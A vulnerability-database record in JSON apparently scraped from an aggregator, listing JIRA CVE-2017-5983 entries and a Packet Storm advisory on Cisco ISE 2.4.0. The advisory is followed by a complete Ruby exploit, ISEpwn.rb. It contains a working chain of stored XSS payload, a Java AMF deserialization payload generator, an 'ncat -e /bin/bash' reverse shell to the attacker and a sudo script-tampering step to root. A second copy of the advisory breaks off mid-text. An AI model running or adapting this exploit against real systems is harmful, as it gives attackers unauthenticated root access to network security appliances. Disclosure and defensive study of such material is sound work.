"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-02-13T04:43:51", "type": "atlassian", "title": "Multiple Vulnerabilities in JIRA Workflow Servlet", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5983"], "modified": "2020-07-14T05:59:27", "id": "ATLASSIAN:JRASERVER-64077", "href": "https://jira.atlassian.com/browse/JRASERVER-64077", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:38:07", "description": "||Affected Versions||\r\n|4.2.4 <= version < 6.3.0|\r\n\r\nAn anonymous user can perform multiple attacks on a vulnerable JIRA instance that could cause remote code execution, the disclosure of private files or execute a denial of service attack against the JIRA server. This vulnerability is caused by the way an XML parser and deserializer was used in JIRA.\r\n\r\nFor additional details see the [full advisory|https://confluence.atlassian.com/x/vzBoN].", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-02-13T04:43:51", "type": "atlassian", "title": "Multiple Vulnerabilities in JIRA Workflow Servlet", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5983"], "modified": "2020-07-14T05:59:27", "id": "JRASERVER-64077", "href": "https://jira.atlassian.com/browse/JRASERVER-64077", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2019-02-05T19:24:37", "description": "", "cvss3": {}, "published": "2019-02-05T00:00:00", "type": "packetstorm", "title": "Cisco ISE 2.4.0 XSS / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5641", "CVE-2018-15440"], "modified": "2019-02-05T00:00:00", "id": "PACKETSTORM:151535", "href": "https://packetstormsecurity.com/files/151535/Cisco-ISE-2.4.0-XSS-Remote-Code-Execution.html", "sourceData": "`>> Multiple vulnerabilities in Cisco Identity Services Engine (Unauth XSS to RCE as root) \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security and Dominik Czarnota (dominik.b.czarnota@gmail.com) \n================================================================================= \nDisclosure: 20/01/2019 / Last updated: 05/02/2019 \n \n \n>> Background and product information \nFrom the vendor's website [1]: \nThe Cisco Identity Services Engine (ISE) is your one-stop solution to streamline security policy management and reduce operating costs. With ISE, you can see users and devices controlling access across wired, wireless, and VPN connections to the corporate network. \n \nCisco ISE allows you to provide highly secure network access to users and devices. It helps you gain visibility into what is happening in your network, such as who is connected, which applications are installed and running, and much more. It also shares vital contextual data, such as user and device identities, threats, and vulnerabilities with integrated solutions from Cisco technology partners, so you can identify, contain, and remediate threats faster.\" \n \n \n>> Summary \nISE is distributed by Cisco as a virtual appliance. We have analysed version 2.4.0.357 and found three vulnerabilities: an unauthenticated stored cross site scripting, a authenticated Java deserialization vulnerability leading to remote code execution as an unprivileged user, and a privilege escalation from that unprivileged user to root. \n \nBy putting them all together, we can achieve remote code execution as root, provided we can trap an administrator into visiting the page vulnerable to the stored cross site scripting. A Ruby exploit that implements this full exploit chain (described in more detail at 'Exploitation summary', at the end of this file) is available in [2]. \n \nAll the vulnerabilities in this advisory were found independently by Agile Information Security. However, vulnerability #2 (Unsafe Flex AMF Java Object Deserialization) was also found and reported to Cisco by Olivier Arteau of Groupe Technologie Desjardins [3] and vulnerability #3 (Privilege Escalation via Incorrect sudo File Permissions) was also found and reported to Cisco by Hector Cuesta [4]. \n \nCisco refused to credit Agile Information Security with finding vulnerabilities #2 and #3, and also refused to provide a CVE for both these vulnerabilities, saying regarding #3 that \"This issue has been evaluated as a hardening effort to improve the security posture of the device. According with our Security vulnerability policy, we request do not request a CVE assignment for issue with a Severity Impact Rating (SIR) lower than Medium. This issue will be fixed in the upcoming ISE release\". \nAt the time of the latest update, Cisco still recommends version 2.4.0.357 - affected by all the vulnerabilities in this advisory - as the \"Suggested Release\" in their software download page. \n \nThese actions show Cisco is incredibly negligent with regards to the security of their customers. They are still shipping (and recommending) a product version vulnerable to unauthenticated remote code execution, with a fully working public exploit and no way to track fixes or fixed versions for these vulnerabilities. \n \nAgile Information Security would like to thank Beyond Security's SSD Secure Disclosure programme for helping us disclose these vulnerabilities to Cisco, and publishing the advisory on their site [5]. \n \n \n>> Technical details: \n#1 \nVulnerability: Stored Cross Site Scripting \nCVE-2018-15440 \nAttack Vector: Remote \nConstraints: None; exploitable by an unauthenticated attacker \nAffected versions: confirmed on ISE virtual appliance v2.4.0.357 \n \nThe LiveLogSettingsServlet, available at /admin/LiveLogSettingsServlet, contains a stored cross site scripting vulnerability. \nThe doGet() HTTP request handler takes in an Action parameter as a HTTP query variable, which can be \"read\" or \"write\". \nWith the \"write\" parameter, it calls the writeLiveLogSettings() function which then takes several query string variables, such as Columns, Rows, Refresh_rate and Time_period. \nThe content of these query string variables is then written to /opt/CSCOcpm/mnt/dashboard/liveAuthProps.txt, and the server responds with a 200 OK. These parameters are not validated, and can contain any text. \n \nWhen the Action parameter equals \"read\", the servlet will read the /opt/CSCOcpm/mnt/dashboard/liveAuthProps.txt file and display it back to the user with the Content-Type \"text/html\", causing whatever was written to that file to be rendered and executed by the browser. \n \nTo mount a simple attack, we can send the following request: \nGET /admin/LiveLogSettingsServlet?Action=write&Columns=1&Rows=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e&Refresh_rate=1337&Time_period=1337 \n \nWhich can then be triggered with: \nGET /admin/LiveLogSettingsServlet?Action=read HTTP/1.1 \n \nHTTP/1.1 200 OK \nContent-Type: text/html;charset=UTF-8 \nContent-Length: 164 \nServer: \n \n<Settings> \n<Columns> \n<Col>1</Col> \n</Columns> \n<Rows><script>alert(1)</script></Rows> \n<Refresh_rate>1337</Refresh_rate> \n<Time_period>1337</Time_period> \n</Settings> \n \nThis vulnerability can be exploited by an unauthenticated attacker. \n \n \n#2 \nVulnerability: Unsafe Flex AMF Java Object Deserialization \nCVE-2017-5641; Please be aware this CVE is not specific to Cisco ISE \nAttack Vector: Remote \nConstraints: Requires authentication to the admin web interface \nAffected versions: confirmed on ISE virtual appliance v2.4.0.357 \n \nBy sending an HTTP POST request with random data to /admin/messagebroker/amfsecure, the server will respond with a 200 OK and binary data that includes: \n...Unsupported AMF version XXXXX... \n \nWhich indicates that the server has a Apache / Adobe Flex AMF (BlazeDS) endpoint at that location. The BlazeDS library version running on the server is 4.0.0.14931, which means it is vulnerable to CVE-2017-5641 [6], the description of which is stated below: \n\"Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.\" \n \nThis vulnerability was previously exploited in DrayTek VigorACS by Agile Information Security, as it can be seen in [7] and [8]. Please refer to that advisory and exploit, as well as [9], [10] and [11] for further details on this vulnerability. \n \nWe were able to re-use some of the exploit code in [7] from the VigorACS vulnerability to create a binary AMF payload that will execute on the server as the iseadminportal user (see Appendix A). \n \nThe the exploit chain works in the same way as the previous one: \na) sends an AMF binary payload to /admin/messagebroker/amfsecure as described in [10] to trigger a Java Remote Method Protocol (JRMP) call back to the attacker \nb) receives the JRMP connection with ysoserial's JRMP listener [12] \nc) calls ysoserial with the ROME payload, as a vulnerable version of Rome (1.0 RC2) is in the Java classpath of the server \nd) execute ncat (the binary is on the ISE virtual appliance) and return a reverse shell running as the iseaminportal user \n \nAppendix A contains the Java code used to generate the AMF payload that will be sent in step a). This code is very similar to the one in [10], and it is highly recommended to read that advisory by Markus Wulftange of Code White for a better understanding of this vulnerability. \n \nThis vulnerability can only be exploited by an authenticated attacker with access to the administrative portal. \n \n \n#3 \nVulnerability: Privilege Escalation via Incorrect sudo File Permissions \nNo CVE assigned; track as SSD-3778 \nAttack Vector: Local \nConstraints: Requires a command shell running as the iseadminportal user \nAffected versions: confirmed on ISE virtual appliance v2.4.0.357 \n \nThe iseadminportal user can run a variety of commands as root via sudo (output of 'sudo -l'): \n(root) NOPASSWD: /opt/CSCOcpm/bin/resetMntDb.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/resetMnTSessDir.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/setdbpw.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/sync_export.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/sync_import.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_export.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_import.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_cleanup.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/ttcontrol.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/updatewallet.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/log-list.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/file-info.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/delete-log-file.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/debug-log-config.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/showinv.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/isebackupcancel.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/nssutils.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/killsubnetscan.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/thirdpartyguestvlan.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/ise-3rdpty-guestvlan.sh * \n(root) NOPASSWD: /opt/CSCOcpm/mnt/bin/CheckDiskSpace.sh * \n(root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/genbackup.sh * \n(root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/createHCTOnPAPScript.sh * \n(root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/backupHostConfigTablesOnPAP.sh * \n(root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/dictionary_attribute_update.sh * \n(root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/deleteguest.sh * \n(root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/iseupgrade-dbexport.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/pxgrid_backup.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/pxgrid_restore.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/pxgrid_sync.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/pbis_monit.sh * \n(root) NOPASSWD: /opt/CSCOcpm/prrt/bin/FIPS_lockdown.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/iseupgradeui.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/show_iowait.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/kerberosprobe.sh * \n(root) NOPASSWD: /opt/CSCOcpm/bin/sxp-servercontrol.sh * \n... \n \nHowever all of the files above are writeable by the iseadminportal user. This makes it trivial to perform privilege escalation to root. All that is needed to do is to edit the files, and add a \"/bin/sh\" to the second and / or last line, then run the script as sudo to get a root shell. \n \n \n>> Exploitation summary: \nBy now you should have a decent idea of how to build a full exploit chain. Since vulnerability #2 (AMF RCE) can only be exploited by an authenticated administrator, we can set up a trap using vulnerability #1 (stored XSS) as an unauthenticated attacker. \n \nBy abusing the stored cross site scripting, we can create a malicious Javascript (see Appendix B) that will be stored in /admin/LiveLogSettingsServlet. If a logged in user visits that page the Javascript payload will send a XMLHttpRequest to /admin/messagebroker/amfsecure with the payload created by the Java code in Appendix A, and start the exploit described in vulnerability #2 (AMF RCE) to obtain a reverse shell as the iseadminuser. \n \nOnce we have the reverse shell, we can run the following command to abuse vulnerability #3 (privilege escalation): \npython -c 'import os;f=open(\"/opt/CSCOcpm/bin/file-info.sh\", \"a+\", 0);f.write(\"if [ \\\"$1\\\" == 1337 ];then\\n/bin/bash\\nfi\\n\");f.close();os.system(\"sudo /opt/CSCOcpm/bin/file-info.sh 1337\")' \n \nThis will add an \"if\" clause at the end of /opt/CSCOcpm/bin/file-info.sh that looks for the \"1337\" parameter, and executes /bin/bash as root when it sees it. That way we won't mess with any important system functionality that might use that file, and we will get our full root shell. \n \nThe full exploit, written in Ruby, is available in [2]. \n \n \n>> Fix: \nCisco claims vulnerability #1 is fixed in version 2.2.0.913. It is unknown if it is fixed in versions 2.4.x (see [13], [14]). \nCisco claims vulnerability #2 is fixed in version 2.4.0.905 (see [3]). \nBy Cisco's own admission, vulnerability #3 is not fixed at the time of the latest update to this advisory (see [4]). \n \nPlease note that Agile Information Security does not verify any fixes, except when noted in the advisory or requested by the vendor. The vendor fixes might be ineffective or incomplete, and it is the vendor's responsibility to ensure the vulnerablities found by Agile Information Security are resolved properly. \n \n \n>> Appendix A (AMF payload generator in Java): \n=== \nimport flex.messaging.io.amf.MessageBody; \nimport flex.messaging.io.amf.ActionMessage; \nimport flex.messaging.io.SerializationContext; \nimport flex.messaging.io.amf.AmfMessageSerializer; \nimport java.io.*; \n \npublic class ACSFlex { \npublic static void main(String[] args) { \nObject unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1])); \n// serialize object to AMF message \ntry { \nbyte[] amf = new byte[0]; \namf = serialize((unicastRef)); \nDataOutputStream os = new DataOutputStream(new FileOutputStream(args[2])); \nos.write(amf); \nSystem.out.println(\"Done, payload written to \" + args[2]); \n} catch (IOException e) { \ne.printStackTrace(); \n} \n} \n \npublic static Object generateUnicastRef(String host, int port) { \njava.rmi.server.ObjID objId = new java.rmi.server.ObjID(); \nsun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port); \nsun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false); \nreturn new sun.rmi.server.UnicastRef(liveRef); \n} \n \npublic static byte[] serialize(Object data) throws IOException { \nMessageBody body = new MessageBody(); \nbody.setData(data); \n \nActionMessage message = new ActionMessage(); \nmessage.addBody(body); \n \nByteArrayOutputStream out = new ByteArrayOutputStream(); \n \nAmfMessageSerializer serializer = new AmfMessageSerializer(); \nserializer.initialize(SerializationContext.getSerializationContext(), out, null); \nserializer.writeMessage(message); \n \nreturn out.toByteArray(); \n} \n} \n=== \n \n \n>> Appendix B (Javascript code to be used in the stored XSS): \n=== \n<script> \nfunction b64toBlob(b64Data, contentType, sliceSize) { \ncontentType = contentType || ''; \nsliceSize = sliceSize || 512; \nvar byteCharacters = atob(b64Data); \nvar byteArrays = []; \nfor (var offset = 0; offset < byteCharacters.length; offset += sliceSize) { \nvar slice = byteCharacters.slice(offset, offset + sliceSize); \nvar byteNumbers = new Array(slice.length); \nfor (var i = 0; i < slice.length; i++) { \nbyteNumbers[i] = slice.charCodeAt(i); \n} \nvar byteArray = new Uint8Array(byteNumbers); \nbyteArrays.push(byteArray); \n} \nvar blob = new Blob(byteArrays, {type: contentType}); \nreturn blob; \n} \nb64_payload = 'cGlzc2FuZXNzZWN1'; \nvar xhr = new XMLHttpRequest(); \nxhr.open(\"POST\", 'https://10.10.10.44/admin/messagebroker/amfsecure', true); \nxhr.send(b64toBlob(b64_payload, 'application/x-amf')); \n</script> \n=== \n \n \n>> References: \n[1] https://www.cisco.com/c/en/us/products/collateral/security/identity-services-engine/data_sheet_c78-656174.html \n[2] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/ISEpwn.rb \n[3] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvj62599 \n[4] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCve49987 \n[5] https://ssd-disclosure.com/index.php/archives/3778 \n[6] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5641 \n[7] https://github.com/pedrib/PoC/tree/master/exploits/acsPwn \n[8] https://raw.githubusercontent.com/pedrib/PoC/master/advisories/draytek-vigor-acs.txt \n[9] https://issues.apache.org/jira/browse/FLEX-35290 \n[10] http://codewhitesec.blogspot.ru/2017/04/amf.html \n[11] https://github.com/mbechler/marshalsec \n[12] https://github.com/frohoff/ysoserial \n[13] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm79609 \n[14] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190109-ise-multi-xss \n \n \n================ \nAgile Information Security Limited \nhttp://www.agileinfosec.co.uk/ \n>> Enabling secure digital business. \n \n \n---------------------------------------------------------------- \n \n--- Exploit: ISEpwn.rb --- \n \n#!/usr/bin/ruby \n \n=begin \nExploit for Cisco Identify Services Engine (ISE), tested on version 2.4.0.357 \nBy Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security, \nand Dominik Czarnota (dominik.b.czarnota@gmail.com) \n \nThis exploit starts by abusing a stored cross scripting to deploy malicious Javascript to /admin/LiveLogSettingsServlet (CVE-2018-15440). \nThe Javascript contains a binary payload that will cause a XHR request to the AMF endpoint on the ISE server, which is vulnerable to CVE-2017-5641 (Unsafe Java AMF deserialization), leading to remote code execution as the iseadminportal user. \nThis AMF deserialization can only be triggered by an authenticated user, hence why the stored XSS is necessary. \nThe exploit will wait until the server executes the AMF deserialization payload and spawn netcat to receive a reverse shell from the server. \nOnce we have code execution as the unprivileged iseadminportal user, we can edit various shell script files under /opt/CSCOcpm/bin/ and run them as sudo, escalating our privileges to root. \n \nThis exploit has only been tested in Linux. The two jars described below are required for execution of the exploit, and they should be in the same directory as this script. \n \n== \nysoserial.jar - get the latest version from https://github.com/frohoff/ysoserial/releases \nacsFlex.jar - build the following code as a JAR: \n \nimport flex.messaging.io.amf.MessageBody; \nimport flex.messaging.io.amf.ActionMessage; \nimport flex.messaging.io.SerializationContext; \nimport flex.messaging.io.amf.AmfMessageSerializer; \nimport java.io.*; \n \npublic class ACSFlex { \npublic static void main(String[] args) { \nObject unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1])); \n// serialize object to AMF message \ntry { \nbyte[] amf = new byte[0]; \namf = serialize((unicastRef)); \nDataOutputStream os = new DataOutputStream(new FileOutputStream(args[2])); \nos.write(amf); \nSystem.out.println(\"Done, payload written to \" + args[2]); \n} catch (IOException e) { \ne.printStackTrace(); \n} \n} \n \npublic static Object generateUnicastRef(String host, int port) { \njava.rmi.server.ObjID objId = new java.rmi.server.ObjID(); \nsun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port); \nsun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false); \nreturn new sun.rmi.server.UnicastRef(liveRef); \n} \n \npublic static byte[] serialize(Object data) throws IOException { \nMessageBody body = new MessageBody(); \nbody.setData(data); \n \nActionMessage message = new ActionMessage(); \nmessage.addBody(body); \n \nByteArrayOutputStream out = new ByteArrayOutputStream(); \n \nAmfMessageSerializer serializer = new AmfMessageSerializer(); \nserializer.initialize(SerializationContext.getSerializationContext(), out, null); \nserializer.writeMessage(message); \n \nreturn out.toByteArray(); \n} \n} \n=end \n \nrequire 'tmpdir' \nrequire 'net/http' \nrequire 'uri' \nrequire 'openssl' \nrequire 'base64' \n \nclass String \ndef black; \"\\e[30m#{self}\\e[0m\" end \ndef red; \"\\e[31m#{self}\\e[0m\" end \ndef green; \"\\e[32m#{self}\\e[0m\" end \ndef brown; \"\\e[33m#{self}\\e[0m\" end \ndef blue; \"\\e[34m#{self}\\e[0m\" end \ndef magenta; \"\\e[35m#{self}\\e[0m\" end \ndef cyan; \"\\e[36m#{self}\\e[0m\" end \ndef gray; \"\\e[37m#{self}\\e[0m\" end \n \ndef bg_black; \"\\e[40m#{self}\\e[0m\" end \ndef bg_red; \"\\e[41m#{self}\\e[0m\" end \ndef bg_green; \"\\e[42m#{self}\\e[0m\" end \ndef bg_brown; \"\\e[43m#{self}\\e[0m\" end \ndef bg_blue; \"\\e[44m#{self}\\e[0m\" end \ndef bg_magenta; \"\\e[45m#{self}\\e[0m\" end \ndef bg_cyan; \"\\e[46m#{self}\\e[0m\" end \ndef bg_gray; \"\\e[47m#{self}\\e[0m\" end \n \ndef bold; \"\\e[1m#{self}\\e[22m\" end \ndef italic; \"\\e[3m#{self}\\e[23m\" end \ndef underline; \"\\e[4m#{self}\\e[24m\" end \ndef blink; \"\\e[5m#{self}\\e[25m\" end \ndef reverse_color; \"\\e[7m#{self}\\e[27m\" end \nend \n \nputs \"\" \nputs \"Cisco Identity Services Engine (ISE) remote code execution as root\".cyan.bold \nputs \"CVE-TODO\".cyan.bold \nputs \" Tested on ISE virtual appliance 2.4.0.357\".cyan.bold \nputs \"By:\".blue.bold \nputs \" Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security\".blue.bold \nputs \" Dominik Czarnota (dominik.b.czarnota@gmail.com)\".blue.bold \nputs \"\" \n \nscript_dir = File.expand_path(File.dirname(__FILE__)) \nysoserial_jar = File.join(script_dir, 'ysoserial.jar') \nacsflex_jar = File.join(script_dir, 'acsFlex.jar') \n \nif (ARGV.length < 3) or not File.exist?(ysoserial_jar) or not File.exist?(acsflex_jar) \nputs \"Usage: ./ISEpwn.rb <rhost> <rport> <lhost>\".bold \nputs \"Spawns a reverse shell from rhost to lhost\" \nputs \"\" \nputs \"NOTES:\\tysoserial.jar and the included acsFlex.jar must be in this script's directory.\" \nputs \"\\tTwo random TCP ports in the range 10000-65535 are used to receive connections from the target.\" \nputs \"\" \nexit(-1) \nend \n \n# Unfortunately I couldn't find a better way to make this interactive, \n# so the user has to copy and paste the python command to write to the shell script \n# and execute as sudo. \n# Spent hours fighting with Ruby and trying to get this without user interaction, \n# hopefully some Ruby God can enlighten me on how to do it properly. \ndef start_nc_thread(nc_port, jrmp_pid) \nIO.popen(\"nc -lvkp #{nc_port.to_s} 2>&1\").each do |line| \nif line.include?('Connection from') \nProcess.kill(\"TERM\", jrmp_pid) \nProcess.wait(jrmp_pid) \nputs \"[+] Shelly is here! Now to escalate your privileges to root, \".green.bold + \n\"copy and paste the following:\".green.bold \nputs %{python -c 'import os;f=open(\"/opt/CSCOcpm/bin/file-info.sh\", \"a+\", 0);f.write(\"if [ \\\\\"$1\\\\\" == 1337 ];then\\\\n/bin/bash\\\\nfi\\\\n\");f.close();os.system(\"sudo /opt/CSCOcpm/bin/file-info.sh 1337\")'} \nputs \"[+] Press enter, then interact with the root shell,\".green.bold + \n\" and press CTRL + C when done\".green.bold \nelse \nputs line \nend \nend \nend \n \nYSOSERIAL = \"#{ysoserial_jar} ysoserial.exploit.JRMPListener JRMP_PORT ROME\" \nJS_PAYLOAD = %{<script>function b64toBlob(e,r,a){r=r||\"\",a=a||512;for(var t=atob(e),n=[],o=0;o<t.length;o+=a){for(var l=t.slice(o,o+a),b=new Array(l.length),h=0;h<l.length;h++)b[h]=l.charCodeAt(h);var p=new Uint8Array(b);n.push(p)}return new Blob(n,{type:r})}b64_payload=\"<PAYLOAD>\";var xhr=new XMLHttpRequest;xhr.open(\"POST\",\"https://<RHOST>/admin/messagebroker/amfsecure\",!0),xhr.send(b64toBlob(b64_payload,\"application/x-amf\"));</script>} \n \nrhost = ARGV[0] \nrport = ARGV[1] \nlhost = ARGV[2].dup.force_encoding('ASCII') \n \nDir.mktmpdir { |temp_dir| \n \nnc_port = rand(10000..65535) \nputs \"[+] Picked port #{nc_port} to receive the shell\".cyan.bold \n \n# step 1: create the AMF payload \nputs \"[+] Creating AMF payload...\".green.bold \njrmp_port = rand(10000..65535) \n \namf_file = temp_dir + \"/payload.ser\" \nsystem(\"java -jar #{acsflex_jar} #{lhost} #{jrmp_port} #{amf_file}\") \namf_payload = File.binread(amf_file) \n \n# step 2: start the ysoserial JRMP listener \nputs \"[+] Picked port #{jrmp_port} for the JRMP server\".cyan.bold \n \n# build the command line argument that will be executed by the server \njava = \"java -cp #{YSOSERIAL.gsub('JRMP_PORT', jrmp_port.to_s)}\" \ncmd = \"ncat -e /bin/bash SERVER PORT\".gsub(\"SERVER\", lhost).gsub(\"PORT\", nc_port.to_s) \nputs \"[+] Sending command #{cmd}\".green.bold \n \njava_split = java.split(' ') << cmd \njrmp = IO.popen(java_split) \njrmp_pid = jrmp.pid \nsleep 5 \n \n# step 3: start the netcat reverse shell listener \nt = Thread.new{start_nc_thread(nc_port, jrmp_pid)} \n \n# step 4: fire the XSS payload and wait for our trap to be sprung \njs_payload = JS_PAYLOAD.gsub('<RHOST>', \"#{rhost}:#{rport}\"). \ngsub('<PAYLOAD>', Base64.strict_encode64(amf_payload)) \nuri = URI.parse(\"https://#{rhost}:#{rport}/admin/LiveLogSettingsServlet\") \nparams = { \n:Action => \"write\", \n:Columns => rand(1..1000).to_s, \n:Rows => js_payload, \n:Refresh_rate => rand(1..1000).to_s, \n:Time_period => rand(1..1000).to_s \n} \nuri.query = URI.encode_www_form( params ) \n \nNet::HTTP.start(uri.host, uri.port, \n{:use_ssl => true, :verify_mode => OpenSSL::SSL::VERIFY_NONE }) do |http| \n#http.set_debug_output($stdout) \nres = http.get(uri) \nend \n \nputs \"[+] XSS payload sent. Waiting for an admin to take the bait...\".green.bold \nbegin \nt.join \nrescue Interrupt \nbegin \nProcess.kill(\"TERM\", jrmp_pid) \nProcess.wait(jrmp_pid) \nrescue Errno::ESRCH \n# if we try to kill a dead process we get this error \nend \nputs \"Exiting...\" \nend \n} \nexit 0 \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/151535/cisco-ise-rce.txt"}], "zdt": [{"lastseen": "2019-02-25T07:56:10", "description": "Cisco Identity Services Engine (ISE) version 2.4.0 suffers from cross site scripting, java deserialization, and in conjunction can lead to remote code execution. Full exploit provided.", "cvss3": {}, "published": "2019-02-06T00:00:00", "type": "zdt", "title": "Cisco ISE 2.4.0 XSS / Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5641", "CVE-2018-15440"], "modified": "2019-02-06T00:00:00", "id": "1337DAY-ID-32135", "href": "https://0day.today/exploit/description/32135", "sourceData": ">> Multiple vulnerabilities in Cisco Identity Services Engine (Unauth XSS to RCE as root)\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security and Dominik Czarnota ([email\u00a0protected])\r\n=================================================================================\r\nDisclosure: 20/01/2019 / Last updated: 05/02/2019\r\n\r\n\r\n>> Background and product information\r\nFrom the vendor's website [1]:\r\nThe Cisco Identity Services Engine (ISE) is your one-stop solution to streamline security policy management and reduce operating costs. With ISE, you can see users and devices controlling access across wired, wireless, and VPN connections to the corporate network.\r\n\r\nCisco ISE allows you to provide highly secure network access to users and devices. It helps you gain visibility into what is happening in your network, such as who is connected, which applications are installed and running, and much more. It also shares vital contextual data, such as user and device identities, threats, and vulnerabilities with integrated solutions from Cisco technology partners, so you can identify, contain, and remediate threats faster.\"\r\n\r\n\r\n>> Summary\r\nISE is distributed by Cisco as a virtual appliance. We have analysed version 2.4.0.357 and found three vulnerabilities: an unauthenticated stored cross site scripting, a authenticated Java deserialization vulnerability leading to remote code execution as an unprivileged user, and a privilege escalation from that unprivileged user to root.\r\n\r\nBy putting them all together, we can achieve remote code execution as root, provided we can trap an administrator into visiting the page vulnerable to the stored cross site scripting. A Ruby exploit that implements this full exploit chain (described in more detail at 'Exploitation summary', at the end of this file) is available in [2].\r\n\r\nAll the vulnerabilities in this advisory were found independently by Agile Information Security. However, vulnerability #2 (Unsafe Flex AMF Java Object Deserialization) was also found and reported to Cisco by Olivier Arteau of Groupe Technologie Desjardins [3] and vulnerability #3 (Privilege Escalation via Incorrect sudo File Permissions) was also found and reported to Cisco by Hector Cuesta [4].\r\n\r\nCisco refused to credit Agile Information Security with finding vulnerabilities #2 and #3, and also refused to provide a CVE for both these vulnerabilities, saying regarding #3 that \"This issue has been evaluated as a hardening effort to improve the security posture of the device. According with our Security vulnerability 